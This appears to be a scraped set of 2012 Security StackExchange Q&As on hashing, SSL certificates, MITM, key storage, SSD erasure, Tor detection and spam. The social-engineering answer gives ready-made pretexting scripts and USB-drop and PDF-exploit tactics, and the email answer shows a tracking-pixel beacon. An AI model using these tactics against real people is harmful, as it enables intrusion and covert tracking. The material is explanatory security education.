Bash Scripting 241 79%
Ruby 127 42%
C 123 40%
Windows Powershell 111 37%
Batch Scripting 108 36%
PHP 107 35%
C++ 66 22%
Java 65 21%
Perl 57 19%
Other 57 19%
VB 29 10%
C# 26 9%
Lua 23 8% | {
"source": [
"https://security.stackexchange.com/questions/11700",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5863/"
]
} |
11,717 | Why can't a password hash be reverse engineered? I've looked into this ages ago and have read lots on it, but I can't find the explanation of why it can't be done. An example will make it easier to understand my question and to keep things simple we will base it on a hashing algorithm that doesn't use a salt ( LanMan ). Say my password is "Password". LanMan will hash this and store it in the database. Cracking programs can brute force these by hashing password guesses that you provide. It then compares the generated hash to the hash in the database. If there is a match, it works out the password. Why, if the password cracker knows the algorithm to turn a plain text password into a hash, can't it just reverse the process to calculate the password from the hash? This question was IT Security Question of the Week . Read the Feb 24, 2012 blog entry for more details or submit your own Question of the Week. | Let me invent a simple "password hashing algorithm" to show you how it works. Unlike the other examples in this thread, this one is actually viable, if you can live with a few bizarre password restrictions. Your password is two large prime numbers, x and y. For example: x = 48112959837082048697
y = 54673257461630679457 You can easily write a computer program to calculate xy in O( N ^2) time, where N is the number of digits in x and y. (Basically that means that it takes four times as long if the numbers are twice as long. There are faster algorithms, but that's irrelevant.) Store xy in the password database. x*y = 2630492240413883318777134293253671517529 A child in fifth grade, given enough scratch paper, could figure out that answer. But how do you reverse it? There are many algorithms people have devised for factoring large numbers, but even the best algorithms are slow compared to how quickly you can multiply x by y. And none of those algorithms could be performed by a fifth grader, unless the numbers were very small (e.g., x=3, y=5). That is the key property: the computation is much simpler going forwards than backwards. For many problems, you must invent a completely new algorithm to reverse a computation. This has nothing to do with injective or bijective functions. When you are cracking a password, it often doesn't matter if you get the same password or if you get a different password with the same hash. The hash function is designed so it is hard to reverse it and get any answer at all, even a different password with the same hash. In crypto-speak: a hash function vulnerable to a preimage attack is utterly worthless. (The password hashing algorithm above is injective if you have a rule that x < y. ) What do cryptography experts do? Sometimes, they try to figure out new algorithms to reverse a hash function (pre-image). They do exactly what you say: analyze the algorithm and try to reverse it. Some algorithms have been reversed before, others have not. Exercise for the reader: Suppose the password database contains the following entry: 3521851118865011044136429217528930691441965435121409905222808922963363310303627 What is the password? (This one is actually not too difficult for a computer.) Footnote: Due to the small number of passwords that people choose in practice, a good password hash is not merely difficult to compute backwards but also time-consuming to compute forwards, to slow down dictionary attacks. As another layer of protection, randomized salt prevents the use of precomputed attack tables (such as "rainbow tables"). Footnote 2: How do we know that it is hard to reverse a hash function? Unfortunately, we don't. We just don't know any easy ways to reverse hash functions. Making a hash function that is provably difficult to reverse is the holy grail of hash function design, and it has not been achieved yet (perhaps it will never happen). | {
"source": [
"https://security.stackexchange.com/questions/11717",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7766/"
]
} |
11,832 | In the news that comes from Iran, you hear that Iran has succeeded in making fake ssl certificates, so that they can find people's gmail account credentials. Some analysts are saying this is possible but difficult, I wonder why it's difficult, where does the difficulty lie in, why can't your ISP do that to you? | Let me explain via a practical example. There are a set of Certificate Authorities (CAs) that browsers implicitly trust. You can see the list of trusted CAs in your browser. For eg. the CAs trusted by Chrome browser can be found at "Wrench Menu > Preferences > Under the Hood > HTTPS/SSL (Manage Certificates) > Authorities tab". So, the certificate that mail.google.com presents to your browser is 'signed' by Thawte SGC CA. This CA is implicitly trusted by the browser. These CAs will issue certificates only after thorough (and manual) verification. You and I cannot trick Thawte or Verisign to sign us a fake certificate for google. Although such cases do happen but are rare and mostly require some insider help. Now, on your own machine, you can go ahead and create certificates stating them to be of google.com. But these certs are 'self-signed' and will not be trusted by browser because the CA (you) are not in its trusted certificates list. In this case, browser will show you the certificate warning. So, now to answer your question, there are a couple ways in which spoofed certificates are created (or made to work): Just as I mentioned above, a person can trick a CA (which is trusted by browser) to issue you a certificate for a site which doesn't belong to you. For this reason people often manually remove trusted CAs from their list. God know what procedures does that CA in that never-heard-of country follows. I've seen paranoid people removing CAs from browsers trusted list. The CA gets hacked (or is made to issue fake certs). In such a case you can issue certs at your will. Not to mention, such CAs immediately go out of business once this is found. You can also have a fake "self-signed" certificate of google.com and still manage to bypass the browser security check if you explicitly add your own CA to browser's trusted list. Companies can do it. I've seen (and worked at) companies where they openly do it for "Compliance reasons". Since your desktop machines are in their control, they install their own CA to your browser's trusted store and present a fake gmail cert to the browser - which browser trusts and they happily intercep ALL your conversations/emails. In all the cases - what do you get by faking a certificate: You can MITM (Man in the middle) the server and the users computer and decrypt the SSL session. I've left many finer nuances of certificate creation in my description above to present a broad picture. You can read about Cert Patrol and perspectives to see how you can prevent falling a victim of a fake certificate even if its CA is in browsers trusted list. You can also read about certificate pinning which can help prevent such certificate hijacks. | {
"source": [
"https://security.stackexchange.com/questions/11832",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7792/"
]
} |
11,839 | I mean, is it just a matter of "how difficult is it to reverse the function with the current technology"? Or is there a mathematical concept or property that makes them different? If it is a matter of "how difficult is it to reverse the function", then is it correct to say that with the progress of the technology, some Cryptographic Hash Functions stop being Cryptographic to be just Hash Functions? Is this what happened to MD5? | Every cryptographic hash function is a hash function. But not every hash function is a cryptographic hash. A cryptographic hash function aims to guarantee a number of security properties. Most importantly that it's hard to find collisions or pre-images and that the output appears random. (There are a few more properties, and "hard" has well defined bounds in this context, but that's not important here.) Non cryptographic hash functions just try to avoid collisions for non malicious input. Some aim to detect accidental changes in data (CRCs), others try to put objects into different buckets in a hash table with as few collisions as possible. In exchange for weaker guarantees they are typically (much) faster. I'd still call MD5 a cryptographic hash function, since it aimed to provide security. But it's broken, and thus no longer usable as a cryptographic hash. On the other hand when you have a non cryptographic hash function, you can't really call it "broken", since it never tried to be secure in the first place. | {
"source": [
"https://security.stackexchange.com/questions/11839",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7796/"
]
} |
11,920 | I've recently finished book The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick The book was released on 4th December 2002. Not talking only about techniques described in this book, but are the ways used by social-engineers still a threat today? I think that now, as we moved at least 10 years from the book and issues described in it, we should be immune to such attacks, as we can quickly verify any information presented to us and with possibilities to use cyphering, high-speed mobile network connections, privileges control systems, biometric identification, etc... Do I live in false sense of safety, or is it fear speaking from me? And now you can think about, whether it was an social engineering to ask such question and get all your valuable knowledge, or not. :-) | You most definitely live in a sense of false security! Social engineering is very prevalent still today, and I doubt that is about to change in decades if ever. Here are some brief explanations on why social engineering works. It's tough to cover everything because social engineering is a really broad field. Some reasons why social engineering works (From the book quoted in the bottom): Most people have the desire to be polite, especially to strangers Professionals want to appear well-informed and intelligent If you are praised, you will often talk more and divulge more Most people would not lie for the sake of lying Most people respond kindly to people who appear concerned about them Being helpful Usually humans want to be helpful to each other. We like doing nice things! I run into the reception at a big corporate office with my papers soaked in coffee. I talk to the receptionist and explain that I have a job interview meeting in 5 minutes, but I just spilled coffee over all my papers. I then ask if the receptionist could be so sweet and print them out again for me with this USB memory stick that I have. This might lead to an actual infection of the receptionist's PC and may gain me a foothold within the network. Using fear The fear of failing or not doing as ordered: The company's director's (John Smith) facebook page (or whatever other source of information) reveals that he has just left on a cruise for 3 weeks. I call the secretary and with a commanding voice I say "Hi, it's Chris calling. I just got off the phone with John Smith, he's having a very good time on his cruise with his wife Carla and kids. However, we are in the midst of integrating a very important business system and he told me to give you a call so you can help us. He couldn't call himself because they are going on a safari, but this is really urgent. All you need to do is take the USB stick that is addressed to him in the mail and plug it in, start the computer and we are all done. The project survives! Thank you very much! You have been a great help! I am sure John Smith will recognize you for this act of helpfulness. " Playing on reciprocation The tailgate. I hold the entry door for you, and I quickly walk behind you. When you open the next door, which is security enabled, I head in the same direction and most people will try and repay the helpful action by holding the door for you again, thus allowing you into a place where you should not be. Worried about getting caught? Nah.. You just say you're sorry and that you went the wrong way. The target would almost feel obliged to hold the door for you! Exploiting the curiosity Try dropping 10 USB sticks in various locations in your organization. You don't have to place them in too obvious places. The USB should have an auto-run phone home program so you can see when someone connects the USB stick and should theoretically be exploited. Another version of this is to drop USB sticks with a single PDF document that is called e.g. "John Smith - Norway.pdf". The PDf document contains a Adobe Acrobat Reader exploit (there is tons of them) and once the user clicks the document he will be owned. Of course, you have made sure that the exploit is tailored to the target organization's specific version of Adobe. It will feel natural for most people to open the document so that they can try return the USB stick to its owner. Another example of curiosity (maybe another term explains this better) is all these SPAM mails or bad Internet ads that you have won something or a Nigerian prince is offering you a whole lot of money if you can help him. I am sure you are familiar with these already, but these are also social engineering attacks, and the reason they haven't stopped is that they still work! That's just a few examples. Of course there are tons more! We can also take a look at historic social engineering events: HBGary Full story can be read here (Page 3 contains the social engineering part) Last year HBGary was hacked. This attack involved many different steps but also a social engineering aspect as well. Long story short, the hacker compromised the email account of a VIP in the company and sent an email to an administrator of the target system saying something like this: "Hi John, I am currently in Europe and I'm bouncing between airports. Can you open up SSH on a high numbered port for me coming from any IP? I need to get some work done". When the administrator gets this email he feels it is natural to comply with this, seeing as the email is coming from a trusted source. But that is not it! The attacker had the password for the account, but the login was not working! So he emails back to the administrator "Hey again, it does not seem to be working. The password is still right? What was the user-name again?". Now he has also provided the actual password for the system (the attacker had it from the earlier compromise of another system in the same hack), giving the attacker a whole lot more trust from the administrator. So of course the administrator complies and tells the attacker his user-name. The list at the top comes from the book " Social Engineering: The Art of Human Hacking " and I can very highly recommend it! | {
"source": [
"https://security.stackexchange.com/questions/11920",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5367/"
]
} |
12,041 | In "Some thoughts on the iPhone contact list controversy and app security" , cdixon blog Chris Dixon makes a statement about web security Many commentators have suggested that a primary security risk is the fact that the data is transmitted in plain text. Encrypting over the wire is always a good idea but in reality “man-in-the-middle” attacks are extremely rare. I would worry primarily about the far more common cases of 1) someone (insider or outsider) stealing in the company’s database, 2) a government subpoena for the company’s database. The best protection against these risks is encrypting the data in such a way that hackers and the company itself can’t unencrypt it (or to not send the data to the servers in the first place). I am wondering if there is any cold, hard, real world data to back up that assertion -- are "man in the middle" attacks actually rare in the real world, based on gathered data from actual intrusions or security incidents? | My favorite current resource for cold, hard, real world data is the Verizon 2011 Data Breach Investigations Report . An excerpt from page 69 of the report: Actions The top three threat action categories were
Hacking, Malware, and Social. The most common
types of hacking actions used were the use of
stolen login credentials, exploiting backdoors,
and man-in-the-middle attacks. From reading that, I infer that it's a secondary action used once somebody has a foothold in the system, but the Dutch High Tech Crime Unit's data says it's quite credible for concern. Of the 32 data breaches that made up their statistics, 15 involved MITM actions. Definitely don't stop there, though. That entire report is a gold mine of reading and the best piece of work that I've come across for demonstrating where threats are really at. For fuzzier references to MiTM attacks and methods, see also this excellent answer to MITM attacks - how likely are they? on Serverfault. I would go further in saying that any instance of a SSL root coughing up a bad cert is a sign of an attack, otherwise they'd be pretty useless compromises. Finally, because I'm that guy , I would definitely try to splice into your network box outside the building if I were doing your pentest. One can do amazing things with a software radio even on a wired connection. | {
"source": [
"https://security.stackexchange.com/questions/12041",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56/"
]
} |
12,066 | Based on this question here: Are "man in the middle" attacks extremely rare? Is it possible to detect man-in-the-middle attacks, and if so, how would one go about it? In addition, what if the attack is taking place via connecting into the local network, such as phone lines? Is there any way to detect it? | While browsing, you can check every time if the certificate that is presented to you by the website is issued by a legitimate CA or its a fake certificate issued by some CA that your browser trusts. Obviously it is not possible do it manually. So, there are tools that do it for you. Cert Patrol and Perspective are browser plugins that do essentially that. They keep a note of which domainnames are issues by which CAs (eg. Google=>Thwate, etc.) and many other parameters related to the certificates and will alarm the user if either the CA changes OR if the public key in the cert changes. These are obviously not detection of MITM, they are more like prevention schemes by detecting that something is odd about the certificate presented by the website. Also while connecting to a SSH server, it asks for the server fingerprint. I'd be alarmed if my ssh client presents me a new fingerprint after I've previously connected to a server. The server host key gets saved to the known_hosts file after first connection, the only reason the client is asking me to validate the fingerprint again is because either the SSH server has restarted/updated OR I am being MITMed. Absolute paranoia demands you to call the system admin on phone and confirm the fingerprint by making him speak the key. | {
"source": [
"https://security.stackexchange.com/questions/12066",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/1229/"
]
} |
12,071 | I am using .NET 4.0 to develop a Windows service that will temporarily store encrypted data in a database. The data will be encrypted when it is inserted, then decrypted, processed, and deleted once processed. This will probably be done as a batch process (thousands of rows at a time). I've looked at Generating Keys for Encryption and Decryption on MSDN, and it looks like I could use TripleDES symmetric encryption (I was thinking of using the RijndaelManaged class). However, if the service fails or I lose my database connection while I am encrypting and inserting the data, I want to be able to pick up where I left off with the same IV and key. How should I store my IV and key on a local computer? I want to be sure it will not be found and used to decrypt the encrypted contents of the database. | At least one thing you can improve rather easily: You can simply store the IV in the database next to the encrypted data. The IV itself is not supposed to be secret . It usually acts as a salt, to avoid a situation where two identical plaintext records get encrypted into identical ciphertext. Storing the IV in the database for each row will eliminate the concern over losing this data. Ideally, each row IV would be unique and random but not secret. That leaves your problem to storing a relatively small piece of information: the key . There should be no issue using the same key for all records in terms of security. As long as the key itself is strong, using a different key does not give you any advantage (in fact, it will be a real headache to manage), so one key should usually be good enough. There are probably many solutions to storing keys securely, but those depend on the level of security you really need. For .NET / Microsoft environment I am guessing you should be looking at DPAPI , although there may be better options out there. In one extreme, you'd need a HSM or a smartcard, but in less-stringent environments storing the key on the filesystem with the right permissions might be sufficient. It all depends on your risk profile and threats. | {
"source": [
"https://security.stackexchange.com/questions/12071",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/7960/"
]
} |
12,152 | I'm deploying a web-based ERP system for a customer, such that both the server and the client machines will be inside the customer's intranet. I was advised in another question not to use TeamViewer to access the server, using more secure means instead, and so did I. But now I'm concerned about whether or not TeamViewer would be appropriate for the client machines, which are not "special" to this system in particular, but nonetheless I don't want to lower their current security, neither I want to compromise the computer on my end. My question, then, is whether or not TeamViewer is "good enough" for simple remote desktop support, where it will be used simply to assist the users in the usage of the system, and whether or not I must take additional measures (like changing the default settings, changing the firewall, etc) to reach a satisfactory level or security. Some details: I already read the company's security statement and in my non-expert opinion all's fine. However, this answer in that other question has put me in doubt. After some research, UPnP in particular does not worry me anymore, since the feature that uses it - DirectIn - is disabled by default. But I wonder if there are more things I should be aware of that's not covered in that document. The Wikipedia article about TeamViewer says the Linux port uses Wine. AFAIK that doesn't affect it's network security, is that correct? Ultimatly, the responsibility of securing my customers' networks is not mine, it's theirs. But I need to advise them about the possibilities of setting up this system, in particular because most of them are small-medium NGOs without any IT staff of their own. Often I won't be able to offer an "ideal" setup, but at least I wanna be able to give advice like: "if you're installing TeamViewer in this machine, you won't be able to do X, Y and Z in it, because I'll disable it"; or: "you can install TeamViewer in any regular machine you want, it's safe in its default configuration; only this one *points to server* is off-limits". My choice of TeamViewer was solely because it was straightforward to install in both Windows and Linux machines, and it just works (its cost is accessible too). But I'm open for other suggestions. I'm low both in budget and specialized staff, so I'm going for the simpler tools, but I wanna make a conscious decision whatever that is. | There's a couple of differences between using a 3rd party supplier (such as teamviewer) and a direct remote control solution (eg, VNC) Team Viewer has advantages in that it doesn't require ports to be opened on the firewall for inbound connections, which removes a potential point of attack. For example if you have something like VNC listening (and it isn't possible to restrict source IP addresses for connections) then if there is a security vulnerability in VNC, or a weak password is used, then there is a risk that an attacker could use this mechanism to attack your customer. However there is a trade-off for this, which is that you're providing a level of trust to the people who create and run the service (in this case teamviewer). If their product or servers are compromised, then it's possible that an attacker would be able to use that to attack anyone using the service. One thing to consider is that if you're a paying customer of the service, you may have some contractual come-back if they're hacked (although that's very likely to depend on the service in question and a whole load of other factors) Like everything in security it's a trade-off. If you have a decently secure remote control product and manage and control it well then I'd be inclined to say that that's likely to be a more secure option than relying on a 3rd party of any kind. That said if the claims on TeamViewers website are accurate it seems likely that they're paying a fair degree of attention to security, and also you could consider that if someone hacks TeamViewer (who have a pretty large number of customers) what's the chance that they'll attack you :) | {
"source": [
"https://security.stackexchange.com/questions/12152",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6939/"
]
} |
12,332 | I have some data that is symmetrically encrypted with a single key in my database. Rather than hard coding it into my code, I am looking for a safer way to store the encryption key. Where can I safely store it? | Here are your possibilities, roughly in decreasing order of sophistication. Use an external Hardware Security Module. There is an entire industry of products designed for offloading security-sensitive operations to external devices. This doesn't solve the problem so much as relocate it, but it relocates it to device that is far more secure, so altogether it's a security win. If you're doing anything high-stakes, then this is almost certainly going to factor into your solution. Tie the encryption to your hardware. In theory HSMs do precisely this, only we tend to expect a bit more sophistication from an HSM than just hardware-backed crypto. But there are cheaper options available if you don't need the throughput and compliance that a true HSM brings to the table. TPM chips were invented in part for this purpose, and many examples exist showing how to integrate with them. Additionally, dedicated crypto hardware has become fairly inexpensive, and re-purposing devices like Open-Source U2F Keys for this is simpler than it sounds. Tie the encryption key to your admin login (e.g. encrypt the the encryption key with your admin login). This is only marginally useful as it requires you to be logged in in order to encrypt/decrypt anything. But on the plus side, no one can encrypt/decrypt anything unless you're logged in (i.e. greater control). Much of the secure storage in Windows works like this. Type in the encryption key when you start up, store it in memory. This protects against offline attacks (unless they capture the key out of RAM, which is tougher to do). Similar to the option above, but also different. However, the server boots into an unusuable state, requiring you to manually supply the key before work can be done. Store the key on a different server. E.g. put the key on the web server and the encrypted data on the database server. This protects you to some degree because someone would have to know to grab the key as well as the database, and they'd also have to have access to both servers. Not amazingly secure, but an extremely popular option anyway. Most people who think they're doing it right do it this way. If you're considering doing this, then also consider one of the first two options mentioned above. Store the key elsewhere on the same server. Adds marginal security, but not a whole lot. Most smaller operations do this -- they shouldn't, but they do. Typically because they only have one server and it runs in some cloud somewhere. This is like taping a key to the door instead of leaving it in the lock; guaranteed to stop the most incompetent of attackers. Store the key in the database. Now you're not even trying. Still, a depressingly popular option. Many cloud-based KMS solutions (e.g: AWS , GCP , Azure ) when used most effectively will bind your encryption to your cloud VMs or environment. The unique identity of your VM is easy for the hypervisor to establish and assert, and the KMS uses the combination of that identity and the permissions you've assigned it to allow access to an HSM-managed encryption key. This is similar to a combination of options 1 and 2, modulated to account for the ephemeral nature of Cloud VMs. These KMS solutions generally also are compatible the platform's other identity mechanisms, effectively tying encryption keys to login keys; a lot like option 3. | {
"source": [
"https://security.stackexchange.com/questions/12332",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8156/"
]
} |
12,395 | I'm looking at the results from the following URL and would like to know how does the Tor Project website "know" that Tor is being used or not. https://check.torproject.org/?lang=en-US&small=1&uptodate=1 I would set up a packet sniffer, but since I'm not an exit node I'm not sure if that would make much of a difference. | In one line: they have a list of all the exit nodes (something like that ). more detailed: I have seen this post demonstrates how to detect a Tor connection in php function IsTorExitPoint(){
if (gethostbyname(ReverseIPOctets($_SERVER['REMOTE_ADDR']).".".$_SERVER['SERVER_PORT'].".".ReverseIPOctets($_SERVER['SERVER_ADDR']).".ip-port.exitlist.torproject.org")=="127.0.0.2") {
return true;
} else {
return false;
}
}
function ReverseIPOctets($inputip){
$ipoc = explode(".",$inputip);
return $ipoc[3].".".$ipoc[2].".".$ipoc[1].".".$ipoc[0];
} A good references explain what it does are available here: The list of the exit nodes. Here is a page maintained by the Tor project, that explains how to
determine if it is Tor. Update: From Tor offical doc that descirbes the TorDNSEL method that mitigates the drawbacks of the old method of testing exitnodes ip list: It is useful for a variety of reasons to determine if a connection is
coming from a Tor node. Early attempts to determine if a given IP
address was a Tor exit used the directory to match IP addresses and
exit policies. This approach had a number of drawbacks, including
false negatives when a Tor router exits traffic from a different IP
address than its OR port listens on. The Tor DNS-based Exit List was
designed to overcome these problems and provide a simple interface for
answering the question: is this a Tor exit? In ruby you have a cool Tor.rb gem that implements this technique: Tor::DNSEL.include?("208.75.57.100") #=> true
Tor::DNSEL.include?("1.2.3.4") #=> false | {
"source": [
"https://security.stackexchange.com/questions/12395",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
12,503 | I was reading another post on destroying IDE drives, and how you could remove data, wipe it, or just destroy the drive. The removed data would still be there in some state, although not easily reachable without software. Wiped data is just removed data, but it has been overwritten and is essentially gone. A destroyed disk, if done well enough, will remove everything, or make it nearly impossible to recover anything. According to my understanding. What about a solid-state drive? Can the data on one of these be recovered once deleted? It seems that this would be the way to go if you constantly dealt with and removed sensitive data, but SSDs only have so long of a life span (again, as I understand). Can data from an SSD be recovered in any way once it is removed, even if it has not been overwritten? | Yes. If you do a normal format, the old data can be recovered. A normal format only deletes/overwrites a tiny bit of filesystem metadata, but does not overwrite all of the data itself. The data is still there. This is especially true on SSDs, due to wear levelling and other features of SSDs. The following research paper studies erasure of data on SSDs: Michael Wei, Laura M. Grupp, Frederick E. Spada, and Steven Swanson. Reliably Erasing Data From Flash-Based Solid State Drives . USENIX Conference on File and Storage Technologies, 2011. One takeaway lesson is that securely erasing data on a SSD is a bit tricky. One reason is that overwriting data on a SSD doesn't work the way you'd think it does, due to wear-leveling and other features. When you ask the SSD to "overwrite" an existing sector, it doesn't actually overwrite or delete the existing data immediately. Instead, it writes the new data somewhere else and just change a pointer to point to the new version (leaving the old version laying around). The old version may eventually get erased, or it may not. As a result, even data you think you have erased, may still be present and accessible on the SSD. Also, SSDs are a bit tricky to sanitize (erase completely), because the methods that used to work for magnetic HDDs don't necessarily work reliably on SSDs (due to the aforementioned wear levelling and other issues). Consequently, utilities that are advertised as providing "secure drive erase" functionality may not be fully secure, if applied to a SSD. For instance, the FAST paper found that, in most cases, performing a full overwrite of all of the data on the SSD twice was enough to sanitize the disk drive, but there were a few exceptional cases where some of the data still remained present. There may be other reasons not to want to perform repeated overwrites of the full drive: it is very slow, and it may reduce the subsequent lifetime of the drive. The FAST paper also found that degaussing (a standard method used for sanitizing magnetic hard drives) is not effective at all at sanitizing SSDs. Moreover, the FAST paper found that standard utilities for sanitizing individual files were highly unreliable on SSDs: often a large fraction of the data remained present somewhere on the drive. Therefore, you should assume there is no reliable way to securely erase individual files on a SSD; you need to sanitize the whole drive, as an entire unit. The most reliable way to securely erase an entire SSD is to use the ATA Secure Erase command. However, this is not foolproof. The FAST paper found that most SSDs implement this correctly, but not all. In particular, 8 of the 12 SSDs they studied supported ATA Secure Erase, and 4 did not. Of the 8 that did support it, 3 had a buggy implementation. 1 buggy implementation was really bad: it reported success, but actually left the data laying around. This is atrociously bad, because there is no way that software could detect the failure to erase. 2 buggy implementations failed and left old data laying around (under certain conditions), but at least they reported failure, so if the software that sends the ATA Secure Erase command checks the result code, at least the failure could be detected. The other possible approach is to use full disk encryption: make sure the entire filesystem on the drive is encrypted from the start (e.g., Bitlocker, Truecrypt). When you want to sanitize the drive, forget all the crypto keys and securely erase them, and then erase the drive as best as possible. This may be a workable solution, though personally I would probably want to combine it with ATA Secure Erase, too, for best security. See also the following questions on this site: Is it enough to only wipe a flash drive once? SSD (Flash Memory) security when data is encrypted in place How can files be deleted in a HIPAA-compliant way? Have anyone tried to extract the encryption key from a SSD? | {
"source": [
"https://security.stackexchange.com/questions/12503",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6522/"
]
} |
12,522 | When viewing some emails in Microsoft Outlook, if the sender has included images, I get the following option appear at the top of the email: "To help protect your privacy, Outlook prevented automatic download of
some pictures in this message" I am unsure how preventing the download of images in an email will protect my privacy. Is this mainly so people who might be looking over my shoulder can't see the visual contents of my email? Or is there a more technical reason; for example, to prevent the use of some kind of exploit in the image format itself (something like What is the corrupted image vulnerability? How does it work? )? If it's the latter, why would the notice specifically mention privacy , as opposed to security? I guess this last question could come down to "because the guy/girl who wrote the notice wrote 'privacy'", or even "because 'privacy' is one of those terms that the general public can relate to", but I'd be interested to know if there's more to it. | First it is important to understand what kind of images the client does not show. In your case, as the message states, these are images which would have been "download" ed. That means these are not images which are embedded in the email (multipart, etc.) , but referenced (HTML img , etc.) . Now imagine what kind of information the sender could gain if your client downloads an image specified by the sender from a server specified by the sender. Of course he would get: The exact time and, very important, the confirmation that you viewed the message at all. He could easily track you. Who could want such information and what for? Spambots could verify that the address is valid and active in use . ... How does it work practically? Say you are viewing a HTML -Mail and it would contain something like this <img src="http://sendercontrolledserver/didviewmail.jpg?address=youremail@yourprovider" width="1" height="1" /> . Your client does not know what happens on the server if it requests that image, the resouce delivered by the server doesn't need to be an image at all, how could the client know before loading it. You couldn't see it with that size, too. These are your private personal information and exposure of them would be a privacy threat. | {
"source": [
"https://security.stackexchange.com/questions/12522",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6220/"
]
} |
12,531 | I'm pretty new to security, so forgive my basic question, but does SSL encrypt POST requests but not GET requests? For instance, if I have two requests GET:
www.mycoolsite.com/index?id=1&type=xyz POST site: www.mycoolsite.com/index
{
Params: id=1&type=xyz
} Is it safe to assume that someone is able to intercept the whole GET request (reading id and type), but if they intercept the POST they will be able to see the site path, but because it is going over SSL, they cannot see the params of id and type? | Now, the question is, do you know what a HTTP request looks like ? Well, assuming not, here's an example of one: GET /test?param1=hello¶m2=world HTTP/1.1
Host: subdomain.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive All of this information is enscapulated within the SSL transport - as the comment on your answer kindly says. This means: Get parameters are encrypted. HTTP Body (post parameters) are encrypted. What's not necessarily secure: The host you're asking for. Most web servers these days support Host: something parameters so multiple domains can be handled by one web server on one interface and IP address. Clearly, this header is encrypted, however, if you run non-https traffic to the site it should be clear which hosts you might connect to. Even if that's not the case, reverse DNS will certainly tell you what's hosted on that IP and you can probably make a reasonable guess from there. Your browser/client information. Unfortunately each https client is different and its negotiation process might potentially give away what platform it runs on, or what browser it is. This is not the end of the world by any means, it's just a fact to understand. POST requests look similar to get requests, except they contain a body. This may look like this: POST /testpost HTTP/1.1
Host: subdomain.test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
param1=hello¶m2=hello There are some more complicated variants, of course, but essentially it is all encrypted anyway. | {
"source": [
"https://security.stackexchange.com/questions/12531",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8280/"
]
} |
12,589 | I fairly often happen across forums spammed with messages such as: Arugula (Eruca sativa) is an quarterly green, pretended or roquette.
It's been Traditional times, overclever 20 flat has be useful to
"foodie" movement.Before impediment 1990s, thrill was norm harvested
foreign wild. Colour has naturalized reactionary world, on top of
everything elseloftier Europe addition North America. Arugula is all
round Mediterranean region, wean away from Morocco and Portugal,
eastern Lebanon plus Turkey. Roughly India, adult seeds are
songeffortless Gargeer. Solvent is scour (Brassicaceae) family, rod is
quite a distance rocket, which is public ... What is the purpose behind such spam? It's annoying, yes, but one assumes that the spammer has some purpose other than to simply annoy to go to the effort of doing this. I don't see any URLs or hot links in the message, and no apparent "funny" formatting that might exploit something. Is this somehow trying to influence web crawlers? (And, if so, to what purpose?) Does it somehow exploit some sort of weakness in the forum software? What? Added: Not really related to the original question -- more of a tangential comment, but I thought it would be worthwhile to keep it in the same place, in case someone else comes looking: The nature of the "strange" posts on the forum I'm mainly thinking about ( http://forums.finehomebuilding.com/ ) has largely changed. What we get now (once/twice a week) are posts that parrot details from previous posts in the thread (often a very old thread), or perhaps details gained from a web search on the thread's topic, but they are generally pointless (at best a "me too" nature) and the English, while technically proper, is a hair stilted and clearly not that of an English speaker (neither British, American, Indian, nor African, all of whose dialects I'm at least passingly familiar with). My best guess is that these are people, probably in China, who are learning English and are using the forum as a sort of test, to see if their post goes undetected. I don't know, however, if this is simply a game, a test for an English class, or a test/practice for a wannabe spammer. (It's unlikely that they're trying to "curry favor" with the spam filter, as the thing ("Mollom") is notoriously flaky and happily lets spam through on the first try while rejecting legitimate posts.) But wait -- there's more!! For about the past year the forum of which I speak has been regularly (at least weekly, and sometimes several times a day -- twice so far this morning) bombarded with posts such as: Kitchen Units For Sale. Thirty Ex Display Kitchens To Clear.
www. e x d i s p l a y k i t c h e n s 1 .co.uk £ 595 Each with appliances. (URL slightly corrupted so as to not encourage these folks.) Apparently this is a major spammer operating out of Europe (and our forum is about 99% US-oriented), so it's pointless at best. The oddest thing is that the constant spamming has apparently "poisoned" the URL for Google (and likely other search engines) such that you have to pretty much spell out the URL to get a "hit". (The other odd thing, of course, is that the system operators seem incapable of blocking this, even though the URL is always the same.) Another question -- Since, as I observed earlier, the "kitchen spam" posts (seen on dozens of other BBs as well) have apparently "poisoned" the associated web site for Google, is it possible that the spam is actually intending to do this, and is instigated by someone (a competitor?) who wishes ill for that web site? | They are trying to do Bayesian poisoning. By sending lots of correct words and a few words which are used in spam, like viagra, those words get a lower spam notification (over time). This means that after a while they can get real spam with links through to the filter. | {
"source": [
"https://security.stackexchange.com/questions/12589",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/8333/"
]
} |
